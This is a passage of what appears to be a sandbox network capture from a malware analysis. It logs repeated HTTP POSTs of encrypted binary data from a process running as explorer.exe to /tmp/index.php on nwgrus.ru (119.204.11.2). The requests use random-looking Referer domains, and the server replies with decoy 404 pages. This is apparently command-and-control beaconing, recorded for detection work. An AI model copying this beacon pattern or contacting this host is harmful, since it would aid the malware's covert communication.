Oct 12, 2024 20:07:47.959476948 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49925	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:47.967969894 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oigeugvvgtqexcr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 210 Host: nwgrus.ru
Oct 12, 2024 20:07:47.968004942 CEST	210	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 37 08 aa fc Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vu7^$Lx'+aXG4xry@I1/sbLP%KO6/Y2%J:*wy!KTF
Oct 12, 2024 20:07:49.466757059 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49932	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:49.474919081 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rscdgmrjlxccyebn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 121 Host: nwgrus.ru
Oct 12, 2024 20:07:49.474951029 CEST	121	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 6c 4c a4 8e Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vulLqL'E>jeDB4e
Oct 12, 2024 20:07:50.949657917 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:50 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49943	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:50.957179070 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jdrsrpxnderfeln.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 326 Host: nwgrus.ru
Oct 12, 2024 20:07:50.957180023 CEST	326	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 72 02 e9 a4 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vur[`\|/z[u9%GwdFNLti2]i?13,?CN"oJU;^&uvLX,X~S&[f
Oct 12, 2024 20:07:52.436352968 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49954	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:52.444674969 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://letknxuqhdcyc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 120 Host: nwgrus.ru
Oct 12, 2024 20:07:52.444685936 CEST	120	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 4f 5c d1 f9 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vuO\Qjn~f^~zJ\|7o
Oct 12, 2024 20:07:53.920020103 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:53 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49964	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:53.929517984 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wkvsglvqmchooeii.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 274 Host: nwgrus.ru
Oct 12, 2024 20:07:53.929550886 CEST	274	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 6f 34 cf ea Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vuo4L\fmv{H/>w>3jhvL_XFrk@Ne^(NwvLa5?=yw!>Je*%OKl0x\|L%
Oct 12, 2024 20:07:55.414083958 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49972	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:55.423439026 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://liwpdohaxncmk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 124 Host: nwgrus.ru
Oct 12, 2024 20:07:55.423453093 CEST	124	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 5c 4b ac 8f Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vu\K`vSrzwC(p
Oct 12, 2024 20:07:56.903420925 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49983	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:56.910952091 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://brtyhhcwxjs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 224 Host: nwgrus.ru
Oct 12, 2024 20:07:56.910976887 CEST	224	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 4b 3a ef ff Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vuK:Q8ept\OGLpE{JYJt@)^LH}Q<~;Y:GRW-4mzxl
Oct 12, 2024 20:07:58.598740101 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:58 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49993	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:58.610378981 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ndcrdrvnqscc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 262 Host: nwgrus.ru
Oct 12, 2024 20:07:58.610402107 CEST	262	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 7d 4e e0 fd Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vu}NHR@[\|u,n7G~\#>FC\=+TM%n]N23t\I %}d18Rk(,Fc[v}\#0Mw
Oct 12, 2024 20:08:00.089637995 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49998	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:08:00.097592115 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bsujsjkqxtjctly.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 207 Host: nwgrus.ru
Oct 12, 2024 20:08:00.097647905 CEST	207	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 4b 54 e5 ad Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vuKTe*rp%oK<`.4o9;BhtA_'Dn)FdnLO\|1"w-lDzB-^
Oct 12, 2024 20:08:01.634527922 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49999	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:08:01.771761894 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tkcyaumypyw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 259 Host: nwgrus.ru
Oct 12, 2024 20:08:01.771790028 CEST	259	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 53 5a fc 93 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vuSZwESId2HV"5_9CLJ ;MN'sb.LghaOFrQyN:P~t@Yc=WejSe:'{
Oct 12, 2024 20:08:03.280970097 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50000	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
